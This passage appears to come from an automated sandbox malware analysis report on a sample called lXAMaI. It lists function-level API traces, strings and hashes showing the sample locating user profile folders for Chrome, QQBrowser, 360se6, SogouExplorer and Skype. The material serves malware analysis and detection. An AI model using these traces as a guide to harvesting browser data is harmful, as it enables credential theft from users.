Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 29fcaf9bee39811261a4695723f58470a4057b5c008b4523ca653ba4c80679fe
Instruction ID: f5e08ef8cb10380f715bcf4db8177d84b6f8f1e410ca63bbcffa9fc51f9a8b9f
Opcode Fuzzy Hash: 29fcaf9bee39811261a4695723f58470a4057b5c008b4523ca653ba4c80679fe
Instruction Fuzzy Hash: 4121C574A01148EBEB05CF90C988B99F7B6FB48345F308188E8066B395C775EE86DF90

Function 100241CF Relevance: 9.0, APIs: 6, Instructions: 35COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000000B), ref: 100241DC
GetSystemMetrics.USER32(0000000C), ref: 100241E3
GetDC.USER32(00000000), ref: 100241FC
GetDeviceCaps.GDI32(00000000,00000058), ref: 1002420D
GetDeviceCaps.GDI32(00000000,0000005A), ref: 10024215
ReleaseDC.USER32(00000000,00000000), ref: 1002421D

Part of subcall function 100258FC: GetSystemMetrics.USER32(00000002), ref: 1002590E
Part of subcall function 100258FC: GetSystemMetrics.USER32(00000003), ref: 10025918

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: MetricsSystem$CapsDevice$Release
String ID:
API String ID: 1151147025-0
Opcode ID: aed5445d8f42e20c208c58015d95cb09923848f0b0cb58d9b3728a2226556161
Instruction ID: 61c1e71e15aed7016cc8514aa90bb4d4e680a57b7f2a50250637e1f5b253285e
Opcode Fuzzy Hash: aed5445d8f42e20c208c58015d95cb09923848f0b0cb58d9b3728a2226556161
Instruction Fuzzy Hash: 66F09030540700AAF320AB718C89B1BBBB4EB84762F51442AEA0586691CBB098468AA1

Function 100171EC Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 115COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32 ref: 1001720B
GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 10017240
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 100172A0

Strings

__GLOBAL_HEAP_SELECTED, xrefs: 1001727A
__MSVCRT_HEAP_SELECT, xrefs: 1001723B

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: EnvironmentFileModuleNameVariableVersion
String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
API String ID: 1385375860-4131005785
Opcode ID: 4ea5607c4ce82d313be80a791aaf2cba821cd591f1ed9166db174d33f6b8f690
Instruction ID: 26a210af1cb0598dd428d716c6dce3179547435320d32d45f9486a386d954e00
Opcode Fuzzy Hash: 4ea5607c4ce82d313be80a791aaf2cba821cd591f1ed9166db174d33f6b8f690
Instruction Fuzzy Hash: E7310375D45288AEEB61C6706C91ADD37F8FB06284F2004E5F58DDE042E631DECB8B21

Function 10022557 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000000,00000405,00000000,?), ref: 10022610
GetWindowLongA.USER32(?,000000FC), ref: 10022621
GetWindowLongA.USER32(?,000000FC), ref: 10022631
SetWindowLongA.USER32(?,000000FC,?), ref: 1002264D

Strings

(, xrefs: 100225FB

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: LongWindow$MessageSend
String ID: (
API String ID: 2178440468-3887548279
Opcode ID: fd074210f4d1298e2aacd8ef182e30a31efaf4843525322a1d1ef273179d176b
Instruction ID: 906a5160a04f10512e344461ce056d5d20db6b5fd95b0eec8f5c719cbcc86912
Opcode Fuzzy Hash: fd074210f4d1298e2aacd8ef182e30a31efaf4843525322a1d1ef273179d176b
Instruction Fuzzy Hash: F231C139600710AFDB10DFA4E889A5DBBF4FF48350F918529E5469B291DB70F801CB94

Function 1000759E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 90sleepfileCOMMON

Download Yara Rule

APIs

SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001C,00000000), ref: 10007617
DeleteFileA.KERNEL32(?), ref: 1000766C
Sleep.KERNEL32(00001472), ref: 100076BB

Part of subcall function 10007436: SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001C,00000000), ref: 10007484
Part of subcall function 10007436: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 100074EB
Part of subcall function 10007436: GetFileSize.KERNEL32(000000FF,00000000), ref: 1000750D
Part of subcall function 10007436: ReadFile.KERNEL32(000000FF,?,00000000,00000000,00000000), ref: 1000754F
Part of subcall function 10007436: CloseHandle.KERNEL32(000000FF), ref: 10007590

Strings

.dat, xrefs: 10007651
Default, xrefs: 1000761D

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: File$FolderPathSpecial$CloseCreateDeleteHandleReadSizeSleep
String ID: .dat$Default
API String ID: 4140139616-889281589
Opcode ID: 25ecd9f7c94e6214ad19762f809327511bdbf37a86a8eaa03f2ee570b40d8ce2
Instruction ID: 17c3fa77cbaa16f01cd4d1abb5820a229d9f30ce2e83b2d700b107d6041f89b3
Opcode Fuzzy Hash: 25ecd9f7c94e6214ad19762f809327511bdbf37a86a8eaa03f2ee570b40d8ce2
Instruction Fuzzy Hash: 6B31C371E001589BD718DF14DC82BEEBBB5FB4A790F6081A8E60D9B280C7756E85CF91

Function 035A9A9E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON

Download Yara Rule

Strings

C:\Program Files (x86)\lXAMaI\lXAMaI.exe, xrefs: 035A9ABA

Memory Dump Source

Source File: 00000007.00000002.3509857649.00000000035A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_35a0000_lXAMaI.jbxd

Similarity

API ID:
String ID: C:\Program Files (x86)\lXAMaI\lXAMaI.exe
API String ID: 0-4146164744
Opcode ID: f653d89f6efb4909405869c5e43fc57ac3b136247424b321986a36dca8f12b62
Instruction ID: d649549d1d6c6269bb6ee2902b55621d342ba4e4998ba3fd9e4d56d74d279d4f
Opcode Fuzzy Hash: f653d89f6efb4909405869c5e43fc57ac3b136247424b321986a36dca8f12b62
Instruction Fuzzy Hash: DE219235608B2EAFDB10EF6DA890E6F77EDFF842647044555E9199B160D730E800A7A0

Function 03609A9E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON

Download Yara Rule

Strings

C:\Program Files (x86)\lXAMaI\lXAMaI.exe, xrefs: 03609ABA

Memory Dump Source

Source File: 00000007.00000002.3509918905.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3600000_lXAMaI.jbxd

Similarity

API ID:
String ID: C:\Program Files (x86)\lXAMaI\lXAMaI.exe
API String ID: 0-4146164744
Opcode ID: 3beeaba887bca3ba469d62d94a85e9c2f558448325f5e024c4e29d97d6e273b0
Instruction ID: 00e2f0a0cb1e0ed984ee7358868ed96008b189e7e1ba4b4cf5f4411699d8d40a
Opcode Fuzzy Hash: 3beeaba887bca3ba469d62d94a85e9c2f558448325f5e024c4e29d97d6e273b0
Instruction Fuzzy Hash: 44218E35200305AFCB28EE65D992E2B77FFEF053747044559E9199B2E2D770E81087A4

Function 10006141 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 71sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 100042DD: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10004306
Part of subcall function 100042DD: Process32First.KERNEL32(?,00000128), ref: 10004323

SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 1000618D

Part of subcall function 1002139B: lstrlenA.KERNEL32(?,?,?,?,?,10005F1B,?,?,00000002,0000005C), ref: 100213DF

Part of subcall function 100211D3: __EH_prolog.LIBCMT ref: 100211D8

Part of subcall function 1002115F: __EH_prolog.LIBCMT ref: 10021164

Part of subcall function 10021051: InterlockedDecrement.KERNEL32(-000000F4), ref: 10021065

Sleep.KERNEL32(000003E8,?,00000002,?,C:\Users\,?,\AppData\Roaming\360se6\User Data\Default,?,?,00000002,0000005C), ref: 10006216

Part of subcall function 100040C1: FindFirstFileA.KERNEL32(00000000,-00000001,?,?), ref: 10004160

Strings

C:\Users\, xrefs: 100061C8
\AppData\Roaming\360se6\User Data\Default, xrefs: 100061BC
360se6.exe, xrefs: 10006168

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: FirstH_prolog$CreateDecrementFileFindFolderInterlockedPathProcess32SleepSnapshotSpecialToolhelp32lstrlen
String ID: 360se6.exe$C:\Users\$\AppData\Roaming\360se6\User Data\Default
API String ID: 1602309176-1244823433
Opcode ID: 14ddc82fb0e0affe1e6c2d1bc00b2dd9e2d8eec900b8ae1c5a6599f900a21190
Instruction ID: ed173266b31052db7079fdf7c69c1959435430af9f7fc922bb0959ad6df1cff5
Opcode Fuzzy Hash: 14ddc82fb0e0affe1e6c2d1bc00b2dd9e2d8eec900b8ae1c5a6599f900a21190
Instruction Fuzzy Hash: E13159B5C00258EBDB29DB60DD92BEDB7B4EB18700F8042D8F609662C1DB746B84CF91

Function 10006271 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 71sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 100042DD: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10004306
Part of subcall function 100042DD: Process32First.KERNEL32(?,00000128), ref: 10004323

SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 100062BD

Part of subcall function 1002139B: lstrlenA.KERNEL32(?,?,?,?,?,10005F1B,?,?,00000002,0000005C), ref: 100213DF

Part of subcall function 100211D3: __EH_prolog.LIBCMT ref: 100211D8

Part of subcall function 1002115F: __EH_prolog.LIBCMT ref: 10021164

Part of subcall function 10021051: InterlockedDecrement.KERNEL32(-000000F4), ref: 10021065

Sleep.KERNEL32(000003E8,?,00000002,?,C:\Users\,?,\AppData\Local\Tencent\QQBrowser\User Data\Default,?,?,00000002,0000005C), ref: 10006346

Part of subcall function 100040C1: FindFirstFileA.KERNEL32(00000000,-00000001,?,?), ref: 10004160

Strings

QQBrowser.exe, xrefs: 10006298
C:\Users\, xrefs: 100062F8
\AppData\Local\Tencent\QQBrowser\User Data\Default, xrefs: 100062EC

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: FirstH_prolog$CreateDecrementFileFindFolderInterlockedPathProcess32SleepSnapshotSpecialToolhelp32lstrlen
String ID: C:\Users\$QQBrowser.exe$\AppData\Local\Tencent\QQBrowser\User Data\Default
API String ID: 1602309176-2662846904
Opcode ID: 8e294026f5e07ef6796a63101b4c8135defddefe664f4fe634d261d0ef9adb0c
Instruction ID: 7c9d42606363e57cf2bcfdd827d083f09404fbe22b82d2d617d25e6fe96dfa0a
Opcode Fuzzy Hash: 8e294026f5e07ef6796a63101b4c8135defddefe664f4fe634d261d0ef9adb0c
Instruction Fuzzy Hash: 0D3189B4C00218EBDB28DB60DD82BEDB7B8EB18700F4042D8F609662C1DB746B84CF91

Function 100063A1 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 71sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 100042DD: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10004306
Part of subcall function 100042DD: Process32First.KERNEL32(?,00000128), ref: 10004323

SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 100063ED

Part of subcall function 1002139B: lstrlenA.KERNEL32(?,?,?,?,?,10005F1B,?,?,00000002,0000005C), ref: 100213DF

Part of subcall function 100211D3: __EH_prolog.LIBCMT ref: 100211D8

Part of subcall function 1002115F: __EH_prolog.LIBCMT ref: 10021164

Part of subcall function 10021051: InterlockedDecrement.KERNEL32(-000000F4), ref: 10021065

Sleep.KERNEL32(000003E8,?,00000002,?,C:\Users\,?,\AppData\Roaming\SogouExplorer,?,?,00000002,0000005C), ref: 10006476

Part of subcall function 100040C1: FindFirstFileA.KERNEL32(00000000,-00000001,?,?), ref: 10004160

Strings

SogouExplorer.exe, xrefs: 100063C8
C:\Users\, xrefs: 10006428
\AppData\Roaming\SogouExplorer, xrefs: 1000641C

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: FirstH_prolog$CreateDecrementFileFindFolderInterlockedPathProcess32SleepSnapshotSpecialToolhelp32lstrlen
String ID: C:\Users\$SogouExplorer.exe$\AppData\Roaming\SogouExplorer
API String ID: 1602309176-2055279553
Opcode ID: 86d0f6b5485e99cadeaf0bf19f88794ce75d2707552764a3c520e1b2df28b747
Instruction ID: 74275ce4df43fc0ff9743144a67377b20251a83d0e52847f9a66e8f23a1ede53
Opcode Fuzzy Hash: 86d0f6b5485e99cadeaf0bf19f88794ce75d2707552764a3c520e1b2df28b747
Instruction Fuzzy Hash: 043159B5C00258EBDB29DB60DD92BEDB7B4EB18700F4042D8F609662C1DB746B85CF91

Function 100064D1 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 71sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 100042DD: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10004306
Part of subcall function 100042DD: Process32First.KERNEL32(?,00000128), ref: 10004323

SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 1000651D

Part of subcall function 1002139B: lstrlenA.KERNEL32(?,?,?,?,?,10005F1B,?,?,00000002,0000005C), ref: 100213DF

Part of subcall function 100211D3: __EH_prolog.LIBCMT ref: 100211D8

Part of subcall function 1002115F: __EH_prolog.LIBCMT ref: 10021164

Part of subcall function 10021051: InterlockedDecrement.KERNEL32(-000000F4), ref: 10021065

Sleep.KERNEL32(000003E8,?,00000002,?,C:\Users\,?,\AppData\Local\Google\Chrome\User Data\Default,?,?,00000002,0000005C), ref: 100065A6

Part of subcall function 100040C1: FindFirstFileA.KERNEL32(00000000,-00000001,?,?), ref: 10004160

Strings

chrome.exe, xrefs: 100064F8
C:\Users\, xrefs: 10006558
\AppData\Local\Google\Chrome\User Data\Default, xrefs: 1000654C

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: FirstH_prolog$CreateDecrementFileFindFolderInterlockedPathProcess32SleepSnapshotSpecialToolhelp32lstrlen
String ID: C:\Users\$\AppData\Local\Google\Chrome\User Data\Default$chrome.exe
API String ID: 1602309176-2559963756
Opcode ID: 5a03e287aed7dbecbe1d48d497024820b2b93f787d17ade648ab061afe22919d
Instruction ID: 990b450cccb3bdd6eca1582194113a37485b1e312aef7b285bb7877890f4bc5c
Opcode Fuzzy Hash: 5a03e287aed7dbecbe1d48d497024820b2b93f787d17ade648ab061afe22919d
Instruction Fuzzy Hash: 41315CB5C0025CABDB29DB64DD92BEDB7B8EB18700F4042D8F609662C1DB746B84CF91

Function 10005EA0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 71sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 100042DD: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10004306
Part of subcall function 100042DD: Process32First.KERNEL32(?,00000128), ref: 10004323

SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 10005EEC

Part of subcall function 1002139B: lstrlenA.KERNEL32(?,?,?,?,?,10005F1B,?,?,00000002,0000005C), ref: 100213DF

Part of subcall function 100211D3: __EH_prolog.LIBCMT ref: 100211D8

Part of subcall function 1002115F: __EH_prolog.LIBCMT ref: 10021164

Part of subcall function 10021051: InterlockedDecrement.KERNEL32(-000000F4), ref: 10021065

Sleep.KERNEL32(000003E8,?,00000002,?,C:\Users\,?,\AppData\Local\Google\Chrome\User Data\Default,?,?,00000002,0000005C), ref: 10005F75

Part of subcall function 100040C1: FindFirstFileA.KERNEL32(00000000,-00000001,?,?), ref: 10004160

Strings

chrome.exe, xrefs: 10005EC7
\AppData\Local\Google\Chrome\User Data\Default, xrefs: 10005F1B
C:\Users\, xrefs: 10005F27

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: FirstH_prolog$CreateDecrementFileFindFolderInterlockedPathProcess32SleepSnapshotSpecialToolhelp32lstrlen
String ID: C:\Users\$\AppData\Local\Google\Chrome\User Data\Default$chrome.exe
API String ID: 1602309176-2559963756
Opcode ID: 82645bb09cec243822159993cb327e54f65ab92b20db749c4f7a75e15a746dbc
Instruction ID: ef8c16d009efe77e0f6d0708e479f646cba3f9f861404ddb69fb6a0e58a38293
Opcode Fuzzy Hash: 82645bb09cec243822159993cb327e54f65ab92b20db749c4f7a75e15a746dbc
Instruction Fuzzy Hash: F8315CB5C00258EBDB29DB60DC92BEDB7B4EB18700F4042D8F609662C1DB746B84CF91

Function 10005FD0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 71sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 100042DD: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10004306
Part of subcall function 100042DD: Process32First.KERNEL32(?,00000128), ref: 10004323

SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 1000601C

Part of subcall function 1002139B: lstrlenA.KERNEL32(?,?,?,?,?,10005F1B,?,?,00000002,0000005C), ref: 100213DF

Part of subcall function 100211D3: __EH_prolog.LIBCMT ref: 100211D8

Part of subcall function 1002115F: __EH_prolog.LIBCMT ref: 10021164

Part of subcall function 10021051: InterlockedDecrement.KERNEL32(-000000F4), ref: 10021065

Sleep.KERNEL32(000003E8,?,00000002,?,C:\Users\,?,\AppData\Roaming\Microsoft\Skype for Desktop,?,?,00000002,0000005C), ref: 100060A5

Part of subcall function 100040C1: FindFirstFileA.KERNEL32(00000000,-00000001,?,?), ref: 10004160

Strings

\AppData\Roaming\Microsoft\Skype for Desktop, xrefs: 1000604B
Skype.exe, xrefs: 10005FF7
C:\Users\, xrefs: 10006057

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: FirstH_prolog$CreateDecrementFileFindFolderInterlockedPathProcess32SleepSnapshotSpecialToolhelp32lstrlen
String ID: C:\Users\$Skype.exe$\AppData\Roaming\Microsoft\Skype for Desktop
API String ID: 1602309176-3499480952
Opcode ID: 55620f1a5741b608b88385382a16b44555287f3c6fde77dda2afed265c1ed8c4
Instruction ID: 6a0dbb6cec09bd13900103ab1c00a3176827b2809dfe8761078eb506e6f7b77a
Opcode Fuzzy Hash: 55620f1a5741b608b88385382a16b44555287f3c6fde77dda2afed265c1ed8c4
Instruction Fuzzy Hash: B53189B4C00218EBDB28DB60DD82BEDB7B4EB18300F4042D8F609622C1DB746B88CF91

Function 10004514 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69stringCOMMON

Download Yara Rule

APIs

GetClassNameA.USER32(?,00000000,00000104), ref: 1000453D
GetWindowTextA.USER32(00000000,?,00000104), ref: 10004575
lstrlenA.KERNEL32(?), ref: 100045D3
GetWindow.USER32(?,00000002), ref: 10004607

Strings

CTXOPConntion_Class, xrefs: 10004543

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: Window$ClassNameTextlstrlen
String ID: CTXOPConntion_Class
API String ID: 1044773953-873508106
Opcode ID: 01d52a5cc2f1c4321813b2d58550d92fe69cc5970e2a7527ac5b05b370274e44
Instruction ID: e7c27410916c58bde9a406589a04ccde53f73b51447431c3b0631cae516509a7
Opcode Fuzzy Hash: 01d52a5cc2f1c4321813b2d58550d92fe69cc5970e2a7527ac5b05b370274e44
Instruction Fuzzy Hash: E6216DBAD00158ABDB15CBA4DC85ACEB7B4FB1C341F1045E4F609A6141EB74ABC4CF90

Function 1001EDA9 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 1001EDAE

Part of subcall function 1001200C: RaiseException.KERNEL32(1001D112,?,?,00000000,?,invalid string position,1001D112,?,1002A9A8,?,invalid string position,00000000,00000000), ref: 1001203A

Strings

C:\ProgramData\Microsoft\eHome, xrefs: 1001EDD8
ios::eofbit set, xrefs: 1001EDEC, 1001EE00, 1001EE08
ios::badbit set, xrefs: 1001EDDB
ios::failbit set, xrefs: 1001EDE5

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
